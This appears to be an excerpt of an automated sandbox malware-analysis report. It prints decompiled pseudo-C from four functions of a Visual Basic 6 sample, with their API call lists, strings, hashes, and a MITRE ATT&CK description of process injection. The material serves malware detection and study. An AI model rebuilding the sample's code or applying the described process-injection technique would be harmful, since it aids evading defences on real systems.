Function 0042F346, Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 28%

			E0042F346(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				long long* _v12;
				long long _v28;
				char _v40;
				char _v44;
				char _v56;
				char _v60;
				void* _v64;
				intOrPtr _v72;
				char _v80;
				intOrPtr _v88;
				char _v96;
				char _v132;
				signed int _v140;
				char* _t54;
				void* _t58;
				intOrPtr* _t59;
				void* _t60;
				char* _t62;
				char _t89;
				intOrPtr* _t90;
				intOrPtr* _t91;
				void* _t94;
				intOrPtr _t97;
				long long* _t98;
				intOrPtr _t103;
				long long _t108;

				_push(0x4013a6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t97;
				_t98 = _t97 - 0x88;
				_v12 = _t98;
				_v8 = 0x401368;
				_t108 =  *0x401360;
				_t89 = 0xa;
				_push( &_v96);
				_push( &_v80);
				 *_t98 = _t108;
				asm("fld1");
				 *_t98 = _t108;
				asm("fld1");
				 *_t98 = _t108;
				_v40 = 0;
				_v44 = 0;
				_v56 = 0;
				_v60 = 0;
				_v64 = 0;
				_v132 = 0;
				_v88 = 0x80020004;
				_v96 = _t89;
				_v72 = 0x80020004;
				_v80 = _t89;
				L0040145A();
				L00401526();
				asm("fcomp qword [0x401358]");
				asm("fnstsw ax");
				asm("sahf");
				if(0 != 0) {
					_push(1);
					_pop(0);
				}
				_v140 =  ~0x00000000;
				_push( &_v96);
				_t54 =  &_v80;
				_push(_t54);
				_push(2);
				L00401562();
				if(_v140 != 0) {
					_push( &_v80);
					_v72 = 0x80020004;
					_v80 = _t89;
					L00401454();
					L00401550();
					_push( &_v80);
					_v72 = 0x80020004;
					_v80 = _t89;
					L00401454();
					L00401550();
					_t103 =  *0x43039c; // 0x235e9a4
					if(_t103 == 0) {
						_push(0x43039c);
						_push(0x40398c);
						L00401592();
					}
					_t90 =  *0x43039c; // 0x235e9a4
					_t58 =  *((intOrPtr*)( *_t90 + 0x14))(_t90,  &_v64);
					asm("fclex");
					if(_t58 < 0) {
						_push(0x14);
						_push(0x40397c);
						_push(_t90);
						_push(_t58);
						L0040158C();
					}
					_t59 = _v64;
					_t91 = _t59;
					_t60 =  *((intOrPtr*)( *_t59 + 0x108))(_t59,  &_v132);
					asm("fclex");
					if(_t60 < 0) {
						_push(0x108);
						_push(0x40399c);
						_push(_t91);
						_push(_t60);
						L0040158C();
					}
					L00401586();
					_push(0xd0);
					L004014A8();
					L0040159E();
					_push(_t60);
					_push( &_v60);
					L0040147E();
					_push(0x12e95b);
					_push(0x381fad);
					_t62 =  &_v60;
					_push(_t62);
					_push(0x565bc1);
					E00403708();
					L004014C0();
					_push( &_v60);
					_t54 =  &_v56;
					_push(_t54);
					_push(2);
					L004014D2();
					if( ~(0 | _t62 == 0x00800f06) != 0) {
						_push(0);
						_push(0);
						_t94 = 1;
						_push(_t94);
						L0040144E();
						L00401598();
						L004014FC();
						st0 = _t108;
						_push(_t94);
						_push(_t94);
						_push(_t94);
						_push( &_v80);
						L004014CC();
						_t54 =  &_v80;
						_push(_t54);
						L0040156E();
						L00401598();
						L00401550();
						_push(0x20);
						L00401448();
					}
				}
				_push(0x42f596);
				_v28 =  *0x401350;
				asm("wait");
				L0040154A();
				L0040154A();
				return _t54;
			}

0x0042f34b
0x0042f356
0x0042f357
0x0042f35e
0x0042f367
0x0042f36a
0x0042f371
0x0042f379
0x0042f37d
0x0042f381
0x0042f384
0x0042f389
0x0042f38b
0x0042f391
0x0042f399
0x0042f39c
0x0042f39f
0x0042f3a2
0x0042f3a5
0x0042f3a8
0x0042f3ab
0x0042f3ae
0x0042f3b1
0x0042f3b4
0x0042f3b7
0x0042f3ba
0x0042f3bf
0x0042f3c4
0x0042f3ca
0x0042f3cc
0x0042f3cd
0x0042f3cf
0x0042f3d1
0x0042f3d1
0x0042f3d8
0x0042f3e1
0x0042f3e2
0x0042f3e5
0x0042f3e6
0x0042f3e8
0x0042f3f7
0x0042f400
0x0042f401
0x0042f404
0x0042f407
0x0042f40f
0x0042f417
0x0042f418
0x0042f41b
0x0042f41e
0x0042f426
0x0042f42b
0x0042f431
0x0042f433
0x0042f438
0x0042f43d
0x0042f43d
0x0042f442
0x0042f44f
0x0042f452
0x0042f456
0x0042f458
0x0042f45a
0x0042f45f
0x0042f460
0x0042f461
0x0042f461
0x0042f466
0x0042f470
0x0042f472
0x0042f478
0x0042f47c
0x0042f47e
0x0042f483
0x0042f488
0x0042f489
0x0042f48a
0x0042f48a
0x0042f492
0x0042f497
0x0042f49c
0x0042f4a9
0x0042f4ae
0x0042f4b2
0x0042f4b3
0x0042f4b8
0x0042f4bd
0x0042f4c2
0x0042f4c5
0x0042f4c6
0x0042f4cb
0x0042f4d2
0x0042f4e9
0x0042f4ea
0x0042f4ed
0x0042f4ee
0x0042f4f0
0x0042f4fb
0x0042f4fd
0x0042f4fe
0x0042f501
0x0042f502
0x0042f503
0x0042f50d
0x0042f512
0x0042f517
0x0042f519
0x0042f51a
0x0042f51b
0x0042f51f
0x0042f520
0x0042f525
0x0042f528
0x0042f529
0x0042f533
0x0042f53b
0x0042f540
0x0042f542
0x0042f542
0x0042f4fb
0x0042f54d
0x0042f552
0x0042f555
0x0042f588
0x0042f590
0x0042f595

APIs

#677.MSVBVM60(?,?,?,?,?,?,?,?), ref: 0042F3BA
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,?,?), ref: 0042F3BF
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?), ref: 0042F3E8
#594.MSVBVM60(?), ref: 0042F407
__vbaFreeVar.MSVBVM60(?), ref: 0042F40F
#594.MSVBVM60(?,?), ref: 0042F41E
__vbaFreeVar.MSVBVM60(?,?), ref: 0042F426
__vbaNew2.MSVBVM60(0040398C,0043039C,?,?), ref: 0042F43D
__vbaHresultCheckObj.MSVBVM60(00000000,0235E9A4,0040397C,00000014), ref: 0042F461
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040399C,00000108), ref: 0042F48A
__vbaFreeObj.MSVBVM60(00000000,?,0040399C,00000108), ref: 0042F492
#570.MSVBVM60(000000D0), ref: 0042F49C
__vbaStrCopy.MSVBVM60(000000D0), ref: 0042F4A9
__vbaStrToAnsi.MSVBVM60(?,00000000,000000D0), ref: 0042F4B3
__vbaSetSystemError.MSVBVM60(00565BC1,?,00381FAD,0012E95B,?,00000000,000000D0), ref: 0042F4D2
__vbaFreeStrList.MSVBVM60(00000002,?,?,00565BC1,?,00381FAD,0012E95B,?,00000000,000000D0), ref: 0042F4F0
#706.MSVBVM60(00000001,00000000,00000000,?,00000000,000000D0), ref: 0042F503
__vbaStrMove.MSVBVM60(00000001,00000000,00000000,?,00000000,000000D0), ref: 0042F50D
#535.MSVBVM60(00000001,00000000,00000000,?,00000000,000000D0), ref: 0042F512
#539.MSVBVM60(?,00000001,00000001,00000001,00000001,00000000,00000000,?,00000000,000000D0), ref: 0042F520
__vbaStrVarMove.MSVBVM60(?,?,00000001,00000001,00000001,00000001,00000000,00000000,?,00000000,000000D0), ref: 0042F529
__vbaStrMove.MSVBVM60(?,?,00000001,00000001,00000001,00000001,00000000,00000000,?,00000000,000000D0), ref: 0042F533
__vbaFreeVar.MSVBVM60(?,?,00000001,00000001,00000001,00000001,00000000,00000000,?,00000000,000000D0), ref: 0042F53B
#569.MSVBVM60(00000020,?,?,00000001,00000001,00000001,00000001,00000000,00000000,?,00000000,000000D0), ref: 0042F542
__vbaFreeStr.MSVBVM60(0042F596), ref: 0042F588
__vbaFreeStr.MSVBVM60(0042F596), ref: 0042F590

Strings

CENTERDANNELSER, xrefs: 0042F4A1

Memory Dump Source

Source File: 00000001.00000002.1300993047.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1300947769.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1301772553.0000000000430000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.1301841364.0000000000432000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1302501500.0000000000473000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#594CheckHresultList$#535#539#569#570#677#706AnsiCopyErrorNew2System
String ID: CENTERDANNELSER
API String ID: 2334019403-3418901058
Opcode ID: 75014a0e88d59ed38ebe08d054a911f59fe1f28a218bd01490c08c5a535e623e
Instruction ID: 5640d20c43b395a931be496d657480849ef53a4e23664c6bdc037eca2a6021f7
Opcode Fuzzy Hash: 75014a0e88d59ed38ebe08d054a911f59fe1f28a218bd01490c08c5a535e623e
Instruction Fuzzy Hash: 2A5151B1D00218BACB10FF95DC86AEEBBB8EB04704F50453FF506B71A1DA7859458B69

Uniqueness

Uniqueness Score: -1.00%

Function 0042F5B1, Relevance: 40.7, APIs: 27, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0042F5B1(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				long long _v48;
				char _v52;
				void* _v56;
				intOrPtr _v64;
				char _v72;
				char _v88;
				intOrPtr _v96;
				char _v104;
				char _v120;
				intOrPtr _v128;
				char _v136;
				intOrPtr* _v148;
				intOrPtr* _t65;
				intOrPtr _t66;
				char* _t68;
				char* _t70;
				char* _t73;
				void* _t75;
				intOrPtr* _t76;
				void* _t77;
				void* _t80;
				intOrPtr* _t81;
				intOrPtr* _t113;
				intOrPtr* _t114;
				intOrPtr* _t115;
				void* _t117;
				void* _t119;
				intOrPtr _t120;
				intOrPtr _t125;
				intOrPtr _t128;

				_t120 = _t119 - 0xc;
				 *[fs:0x0] = _t120;
				_v16 = _t120 - 0x8c;
				_v12 = 0x401380;
				_v8 = 0;
				_t65 = _a4;
				_t66 =  *((intOrPtr*)( *_t65 + 4))(_t65, __edi, __esi, __ebx,  *[fs:0x0], 0x4013a6, _t117);
				_v28 = 0;
				_v32 = 0;
				_v36 = 0;
				_v40 = 0;
				_v48 = 0;
				_v44 = 0;
				_v52 = 0;
				_v56 = 0;
				_v72 = 0;
				_v88 = 0;
				_v104 = 0;
				_v120 = 0;
				_v136 = 0;
				L0040159E();
				_push(0x403be8);
				_push(0x403bf0);
				L00401532();
				L00401598();
				_push(_t66);
				_push(0x403bf0);
				L00401532();
				_v64 = _t66;
				_push( &_v72);
				_t68 =  &_v88;
				_push(_t68);
				_v72 = 8;
				L00401442();
				_push(0x403bf0);
				_push(0x403bf0);
				L00401532();
				_v96 = _t68;
				_push( &_v88);
				_t70 =  &_v104;
				_push(_t70);
				_v104 = 0x8008;
				L004014DE();
				L0040154A();
				_push( &_v104);
				_push( &_v88);
				_t73 =  &_v72;
				_push(_t73);
				_push(3);
				L00401562();
				if(_t70 != 0) {
					L00401580();
					L00401598();
					_t125 =  *0x43039c; // 0x235e9a4
					if(_t125 == 0) {
						_push(0x43039c);
						_push(0x40398c);
						L00401592();
					}
					_t113 =  *0x43039c; // 0x235e9a4
					_t75 =  *((intOrPtr*)( *_t113 + 0x4c))(_t113,  &_v56);
					asm("fclex");
					if(_t75 < 0) {
						_push(0x4c);
						_push(0x40397c);
						_push(_t113);
						_push(_t75);
						L0040158C();
					}
					_t76 = _v56;
					_t114 = _t76;
					_t77 =  *((intOrPtr*)( *_t76 + 0x28))(_t76);
					asm("fclex");
					if(_t77 < 0) {
						_push(0x28);
						_push(0x403a20);
						_push(_t114);
						_push(_t77);
						L0040158C();
					}
					L00401586();
					_push(0);
					_push( &_v72);
					_v64 = 1;
					_v72 = 2;
					L0040143C();
					L00401598();
					L00401550();
					_t128 =  *0x43039c; // 0x235e9a4
					if(_t128 == 0) {
						_push(0x43039c);
						_push(0x40398c);
						L00401592();
					}
					_t115 =  *0x43039c; // 0x235e9a4
					_t80 =  *((intOrPtr*)( *_t115 + 0x1c))(_t115,  &_v56);
					asm("fclex");
					if(_t80 < 0) {
						_push(0x1c);
						_push(0x40397c);
						_push(_t115);
						_push(_t80);
						L0040158C();
					}
					_t81 = _v56;
					_v128 = 0x80020004;
					_v136 = 0xa;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v148 = _t81;
					asm("movsd");
					_t73 =  *((intOrPtr*)( *_t81 + 0x5c))(_t81,  &_v52);
					asm("fclex");
					if(_t73 < 0) {
						_push(0x5c);
						_push(0x4039d4);
						_push(_v148);
						_push(_t73);
						L0040158C();
					}
					_v52 = 0;
					L00401598();
					L00401586();
				}
				_v48 =  *0x401378;
				asm("wait");
				_push(0x42f835);
				L0040154A();
				L0040154A();
				L0040154A();
				L0040154A();
				return _t73;
			}

0x0042f5b4
0x0042f5c3
0x0042f5d3
0x0042f5d6
0x0042f5df
0x0042f5e2
0x0042f5e8
0x0042f5f1
0x0042f5f4
0x0042f5f7
0x0042f5fa
0x0042f5fd
0x0042f600
0x0042f603
0x0042f606
0x0042f609
0x0042f60c
0x0042f60f
0x0042f612
0x0042f615
0x0042f61b
0x0042f620
0x0042f62a
0x0042f62b
0x0042f635
0x0042f63a
0x0042f63b
0x0042f63c
0x0042f641
0x0042f647
0x0042f648
0x0042f64b
0x0042f64c
0x0042f653
0x0042f658
0x0042f659
0x0042f65a
0x0042f65f
0x0042f665
0x0042f666
0x0042f669
0x0042f66a
0x0042f671
0x0042f67c
0x0042f684
0x0042f688
0x0042f689
0x0042f68c
0x0042f68d
0x0042f68f
0x0042f69a
0x0042f6a0
0x0042f6aa
0x0042f6af
0x0042f6b5
0x0042f6b7
0x0042f6bc
0x0042f6c1
0x0042f6c1
0x0042f6c6
0x0042f6d3
0x0042f6d6
0x0042f6da
0x0042f6dc
0x0042f6de
0x0042f6e3
0x0042f6e4
0x0042f6e5
0x0042f6e5
0x0042f6ea
0x0042f6f0
0x0042f6f2
0x0042f6f5
0x0042f6f9
0x0042f6fb
0x0042f6fd
0x0042f702
0x0042f703
0x0042f704
0x0042f704
0x0042f70c
0x0042f711
0x0042f715
0x0042f716
0x0042f71d
0x0042f724
0x0042f72e
0x0042f736
0x0042f73b
0x0042f741
0x0042f743
0x0042f748
0x0042f74d
0x0042f74d
0x0042f752
0x0042f75f
0x0042f762
0x0042f766
0x0042f768
0x0042f76a
0x0042f76f
0x0042f770
0x0042f771
0x0042f771
0x0042f776
0x0042f782
0x0042f789
0x0042f79b
0x0042f79c
0x0042f79d
0x0042f79f
0x0042f7a5
0x0042f7a6
0x0042f7ab
0x0042f7ad
0x0042f7af
0x0042f7b1
0x0042f7b6
0x0042f7bc
0x0042f7bd
0x0042f7bd
0x0042f7c8
0x0042f7cb
0x0042f7d3
0x0042f7d3
0x0042f7de
0x0042f7e1
0x0042f7e2
0x0042f817
0x0042f81f
0x0042f827
0x0042f82f
0x0042f834

APIs

__vbaStrCopy.MSVBVM60 ref: 0042F61B
__vbaStrCat.MSVBVM60(00403BF0,00403BE8), ref: 0042F62B
__vbaStrMove.MSVBVM60(00403BF0,00403BE8), ref: 0042F635
__vbaStrCat.MSVBVM60(00403BF0,00000000,00403BF0,00403BE8), ref: 0042F63C
#520.MSVBVM60(?,?,00403BF0,00000000,00403BF0,00403BE8), ref: 0042F653
__vbaStrCat.MSVBVM60(00403BF0,00403BF0,?,?,00403BF0,00000000,00403BF0,00403BE8), ref: 0042F65A
__vbaVarTstNe.MSVBVM60(?,?,00403BF0,00403BF0,?,?,00403BF0,00000000,00403BF0,00403BE8), ref: 0042F671
__vbaFreeStr.MSVBVM60(?,?,00403BF0,00403BF0,?,?,00403BF0,00000000,00403BF0,00403BE8), ref: 0042F67C
__vbaFreeVarList.MSVBVM60(00000003,00000008,?,00008008,?,?,00403BF0,00403BF0,?,?,00403BF0,00000000,00403BF0,00403BE8), ref: 0042F68F
#611.MSVBVM60(00403BE8), ref: 0042F6A0
__vbaStrMove.MSVBVM60(00403BE8), ref: 0042F6AA
__vbaNew2.MSVBVM60(0040398C,0043039C,00403BE8), ref: 0042F6C1
__vbaHresultCheckObj.MSVBVM60(00000000,0235E9A4,0040397C,0000004C), ref: 0042F6E5
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403A20,00000028), ref: 0042F704
__vbaFreeObj.MSVBVM60(00000000,?,00403A20,00000028), ref: 0042F70C
#705.MSVBVM60(00000008,00000000), ref: 0042F724
__vbaStrMove.MSVBVM60(00000008,00000000), ref: 0042F72E
__vbaFreeVar.MSVBVM60(00000008,00000000), ref: 0042F736
__vbaNew2.MSVBVM60(0040398C,0043039C,00000008,00000000), ref: 0042F74D
__vbaHresultCheckObj.MSVBVM60(00000000,0235E9A4,0040397C,0000001C), ref: 0042F771
__vbaHresultCheckObj.MSVBVM60(00000000,?,004039D4,0000005C,?,?,?,?,?), ref: 0042F7BD
__vbaStrMove.MSVBVM60(?,?,?,?,?), ref: 0042F7CB
__vbaFreeObj.MSVBVM60(?,?,?,?,?), ref: 0042F7D3
__vbaFreeStr.MSVBVM60(0042F835,00403BE8), ref: 0042F817
__vbaFreeStr.MSVBVM60(0042F835,00403BE8), ref: 0042F81F
__vbaFreeStr.MSVBVM60(0042F835,00403BE8), ref: 0042F827
__vbaFreeStr.MSVBVM60(0042F835,00403BE8), ref: 0042F82F

Memory Dump Source

Source File: 00000001.00000002.1300993047.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1300947769.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1301772553.0000000000430000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.1301841364.0000000000432000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1302501500.0000000000473000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultMove$New2$#520#611#705CopyList
String ID:
API String ID: 3525467279-0
Opcode ID: 314be69f0c9f42b8dfc18160d83e655a2504bcaf188fca841f359b88edf20cc3
Instruction ID: fe4bdecca5232cca4ad7e6b57b50f604aff24db5b98e4763db1eac3e1464df30
Opcode Fuzzy Hash: 314be69f0c9f42b8dfc18160d83e655a2504bcaf188fca841f359b88edf20cc3
Instruction Fuzzy Hash: 46610EB1D01218ABCB10EF95DD86ADEBBB8BF48304F50443EF506BB1A1DB785A058F58

Uniqueness

Uniqueness Score: -1.00%

Function 0042CB97, Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 119
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0042CB97(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __fp0) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v52;
				char _v60;
				intOrPtr _t30;
				void* _t32;
				intOrPtr* _t33;
				void* _t34;
				char* _t35;
				char* _t36;
				intOrPtr* _t56;
				intOrPtr* _t57;
				intOrPtr* _t58;
				intOrPtr _t61;
				intOrPtr _t64;
				intOrPtr _t67;
				void* _t69;

				_t69 = __fp0;
				_push(0x4013a6);
				_t30 =  *[fs:0x0];
				_push(_t30);
				 *[fs:0x0] = _t61;
				_v12 = _t61 - 0x50;
				_v8 = 0x4011a8;
				_push(1);
				_v24 = 0;
				_v32 = 0;
				_v36 = 0;
				_v40 = 0;
				_v44 = 0;
				_v60 = 0;
				L00401502();
				if(_t30 != 0x800000) {
					_t64 =  *0x43039c; // 0x235e9a4
					if(_t64 == 0) {
						_push(0x43039c);
						_push(0x40398c);
						L00401592();
					}
					_t56 =  *0x43039c; // 0x235e9a4
					_t32 =  *((intOrPtr*)( *_t56 + 0x14))(_t56,  &_v44);
					asm("fclex");
					if(_t32 < 0) {
						_push(0x14);
						_push(0x40397c);
						_push(_t56);
						_push(_t32);
						L0040158C();
					}
					_t33 = _v44;
					_t57 = _t33;
					_t34 =  *((intOrPtr*)( *_t33 + 0xf8))(_t33,  &_v40);
					asm("fclex");
					if(_t34 < 0) {
						_push(0xf8);
						_push(0x40399c);
						_push(_t57);
						_push(_t34);
						L0040158C();
					}
					_v40 = 0;
					L00401598();
					L00401586();
					L004014FC();
					st0 = _t69;
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xffffffff);
					_t35 =  &_v60;
					_push(_t35);
					_v52 = 0;
					_v60 = 2;
					L004014F6();
					L00401598();
					L00401550();
					_t67 =  *0x43039c; // 0x235e9a4
					if(_t67 == 0) {
						_push(0x43039c);
						_push(0x40398c);
						L00401592();
					}
					_t58 =  *0x43039c; // 0x235e9a4
					L004014EA();
					_t36 =  &_v44;
					L004014F0();
					_t30 =  *((intOrPtr*)( *_t58 + 0x40))(_t58, _t36, _t36, _t35, _v36, 0x403a4c, L"Postkassen5");
					asm("fclex");
					if(_t30 < 0) {
						_push(0x40);
						_push(0x40397c);
						_push(_t58);
						_push(_t30);
						L0040158C();
					}
					L00401586();
				}
				asm("wait");
				_push(0x42cd29);
				L0040154A();
				L0040154A();
				L00401586();
				return _t30;
			}

0x0042cb97
0x0042cb9c
0x0042cba1
0x0042cba7
0x0042cba8
0x0042cbb5
0x0042cbb8
0x0042cbc1
0x0042cbc3
0x0042cbc6
0x0042cbc9
0x0042cbcc
0x0042cbcf
0x0042cbd2
0x0042cbd5
0x0042cbdf
0x0042cbe5
0x0042cbeb
0x0042cbed
0x0042cbf2
0x0042cbf7
0x0042cbf7
0x0042cbfc
0x0042cc09
0x0042cc0c
0x0042cc10
0x0042cc12
0x0042cc14
0x0042cc19
0x0042cc1a
0x0042cc1b
0x0042cc1b
0x0042cc20
0x0042cc2a
0x0042cc2c
0x0042cc32
0x0042cc36
0x0042cc38
0x0042cc3d
0x0042cc42
0x0042cc43
0x0042cc44
0x0042cc44
0x0042cc4f
0x0042cc52
0x0042cc5a
0x0042cc5f
0x0042cc64
0x0042cc66
0x0042cc68
0x0042cc6a
0x0042cc6c
0x0042cc6e
0x0042cc71
0x0042cc72
0x0042cc75
0x0042cc7c
0x0042cc86
0x0042cc8e
0x0042cc93
0x0042cc99
0x0042cc9b
0x0042cca0
0x0042cca5
0x0042cca5
0x0042ccaa
0x0042ccbf
0x0042ccc5
0x0042ccc9
0x0042ccd0
0x0042ccd3
0x0042ccd7
0x0042ccd9
0x0042ccdb
0x0042cce0
0x0042cce1
0x0042cce2
0x0042cce2
0x0042ccea
0x0042ccea
0x0042ccef
0x0042ccf0
0x0042cd13
0x0042cd1b
0x0042cd23
0x0042cd28

APIs

#589.MSVBVM60(00000001), ref: 0042CBD5
__vbaNew2.MSVBVM60(0040398C,0043039C,00000001), ref: 0042CBF7
__vbaHresultCheckObj.MSVBVM60(00000000,0235E9A4,0040397C,00000014), ref: 0042CC1B
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040399C,000000F8), ref: 0042CC44
__vbaStrMove.MSVBVM60(00000000,?,0040399C,000000F8), ref: 0042CC52
__vbaFreeObj.MSVBVM60(00000000,?,0040399C,000000F8), ref: 0042CC5A
#535.MSVBVM60(00000000,?,0040399C,000000F8), ref: 0042CC5F
#704.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE), ref: 0042CC7C
__vbaStrMove.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE), ref: 0042CC86
__vbaFreeVar.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE), ref: 0042CC8E
__vbaNew2.MSVBVM60(0040398C,0043039C,?,000000FF,000000FE,000000FE,000000FE), ref: 0042CCA5
__vbaCastObj.MSVBVM60(?,00403A4C,Postkassen5,?,000000FF,000000FE,000000FE,000000FE), ref: 0042CCBF
__vbaObjSet.MSVBVM60(?,00000000,?,00403A4C,Postkassen5,?,000000FF,000000FE,000000FE,000000FE), ref: 0042CCC9
__vbaHresultCheckObj.MSVBVM60(00000000,0235E9A4,0040397C,00000040), ref: 0042CCE2
__vbaFreeObj.MSVBVM60(00000000,0235E9A4,0040397C,00000040), ref: 0042CCEA
__vbaFreeStr.MSVBVM60(0042CD29,00000001), ref: 0042CD13
__vbaFreeStr.MSVBVM60(0042CD29,00000001), ref: 0042CD1B
__vbaFreeObj.MSVBVM60(0042CD29,00000001), ref: 0042CD23

Strings

Postkassen5, xrefs: 0042CCB2

Memory Dump Source

Source File: 00000001.00000002.1300993047.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1300947769.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1301772553.0000000000430000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.1301841364.0000000000432000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1302501500.0000000000473000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$MoveNew2$#535#589#704Cast
String ID: Postkassen5
API String ID: 733272219-3167848707
Opcode ID: 9ba6050dca04e61699f552d8d7038e24c4687e4afef4584abcea8663456b806f
Instruction ID: d2fbb5e92977b8a9f76b7ed366270cce83eb5455a2f784f2b8b98039f494a740
Opcode Fuzzy Hash: 9ba6050dca04e61699f552d8d7038e24c4687e4afef4584abcea8663456b806f
Instruction Fuzzy Hash: A3416670940214BBCB10EF96CC86EEEBBB8AF98714F60052FF406771E1DB785501CA69

Uniqueness

Uniqueness Score: -1.00%

Function 0042F85A, Relevance: 10.6, APIs: 7, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E0042F85A(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr* _a16) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v40;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				intOrPtr* _t24;
				char* _t27;
				char* _t29;
				char* _t32;
				intOrPtr* _t37;
				void* _t40;
				void* _t42;
				intOrPtr _t43;

				_t43 = _t42 - 0xc;
				 *[fs:0x0] = _t43;
				_v16 = _t43 - 0x34;
				_v12 = 0x401390;
				_v8 = 0;
				_t24 = _a4;
				 *((intOrPtr*)( *_t24 + 4))(_t24, __edi, __esi, __ebx,  *[fs:0x0], 0x4013a6, _t40);
				_push( &_v56);
				_push(0);
				_t27 =  &_v64;
				_push(_t27);
				_v40 = 0;
				_v48 = 0;
				_v52 = 0;
				_v56 = 0;
				_v60 = 0;
				_v64 = 0;
				L0040147E();
				_t37 = _a16;
				_push(_t27);
				_push( &_v40);
				_push(0);
				_push( *_t37);
				_t29 =  &_v60;
				_push(_t29);
				L0040147E();
				_push(_t29);
				_push(0);
				E00403694();
				L004014C0();
				_push(_v60);
				_push(_t37);
				L00401436();
				_push(_v64);
				_push( &_v52);
				L00401436();
				_push( &_v64);
				_t32 =  &_v60;
				_push(_t32);
				_push(2);
				L004014D2();
				_push(0x42f91b);
				L0040154A();
				return _t32;
			}

0x0042f85d
0x0042f86c
0x0042f879
0x0042f87c
0x0042f885
0x0042f888
0x0042f88e
0x0042f894
0x0042f895
0x0042f896
0x0042f899
0x0042f89a
0x0042f89d
0x0042f8a0
0x0042f8a3
0x0042f8a6
0x0042f8a9
0x0042f8ac
0x0042f8b1
0x0042f8b4
0x0042f8b8
0x0042f8b9
0x0042f8ba
0x0042f8bc
0x0042f8bf
0x0042f8c0
0x0042f8c5
0x0042f8c6
0x0042f8c7
0x0042f8cc
0x0042f8d1
0x0042f8d4
0x0042f8d5
0x0042f8da
0x0042f8e0
0x0042f8e1
0x0042f8e9
0x0042f8ea
0x0042f8ed
0x0042f8ee
0x0042f8f0
0x0042f8f8
0x0042f915
0x0042f91a

APIs

__vbaStrToAnsi.MSVBVM60(?,00000000,?), ref: 0042F8AC
__vbaStrToAnsi.MSVBVM60(?,?,00000000,?,00000000,?,00000000,?), ref: 0042F8C0
__vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,00000000,?,00000000,?,00000000,?), ref: 0042F8CC
__vbaStrToUnicode.MSVBVM60(?,?,00000000,00000000,?,?,00000000,?,00000000,?,00000000,?), ref: 0042F8D5
__vbaStrToUnicode.MSVBVM60(?,?,?,?,00000000,00000000,?,?,00000000,?,00000000,?,00000000,?), ref: 0042F8E1
__vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,?,00000000,00000000,?,?,00000000,?,00000000,?,00000000), ref: 0042F8F0
__vbaFreeStr.MSVBVM60(0042F91B), ref: 0042F915

Memory Dump Source

Source File: 00000001.00000002.1300993047.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1300947769.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1301772553.0000000000430000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.1301841364.0000000000432000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1302501500.0000000000473000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$AnsiFreeUnicode$ErrorListSystem
String ID:
API String ID: 2476255217-0
Opcode ID: ab57d795cc8bd06970521e6405f7bd7593b2dfef0ae907bfefcd7bfdf8111d12
Instruction ID: 31ac72f5cad0e941787232b945b7e40f42aab6f8b83ea393bdfc72019e895c12
Opcode Fuzzy Hash: ab57d795cc8bd06970521e6405f7bd7593b2dfef0ae907bfefcd7bfdf8111d12
Instruction Fuzzy Hash: CD11E7B1C10218BBCB10EFD5E946EDEBBBCAF08704F50406BF501B3161D7789A058BA5

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

